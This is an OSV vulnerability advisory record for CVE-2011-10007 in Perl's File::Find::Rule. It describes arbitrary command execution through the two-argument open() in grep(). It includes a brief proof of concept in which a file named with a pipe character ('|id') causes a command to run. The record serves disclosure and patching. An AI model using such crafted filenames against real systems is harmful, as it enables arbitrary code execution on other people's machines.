{"id":"AZL-62239","summary":"CVE-2011-10007 affecting package perl-File-Find-Rule 0.34-15","details":"File::Find::Rule through 0.34 for Perl is vulnerable to Arbitrary Code Execution when `grep()` encounters a crafted filename.\n\nA file handle is opened with the 2 argument form of `open()` allowing an attacker controlled filename to provide the MODE parameter to `open()`, turning the filename into a command to be executed.\n\nExample:\n\n$ mkdir /tmp/poc; echo \u003e \"/tmp/poc/|id\"\n$ perl -MFile::Find::Rule \\\n    -E 'File::Find::Rule-\u003egrep(\"foo\")-\u003ein(\"/tmp/poc\")'\nuid=1000(user) gid=1000(user) groups=1000(user),100(users)","modified":"2026-04-21T04:31:58.370491Z","published":"2025-06-05T12:15:22Z","upstream":["CVE-2011-10007"],"references":[{"type":"WEB","url":"https://nvd.nist.gov/vuln/detail/CVE-2011-10007"}],"affected":[{"package":{"name":"perl-File-Find-Rule","ecosystem":"Azure Linux:3","purl":"pkg:rpm/azure-linux/perl-File-Find-Rule"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"0"},{"last_affected":"0.34-15"}]}],"database_specific":{"source":"https://github.com/microsoft/AzureLinuxVulnerabilityData/blob/main/osv/AZL-62239.json"}}],"schema_version":"1.7.5"}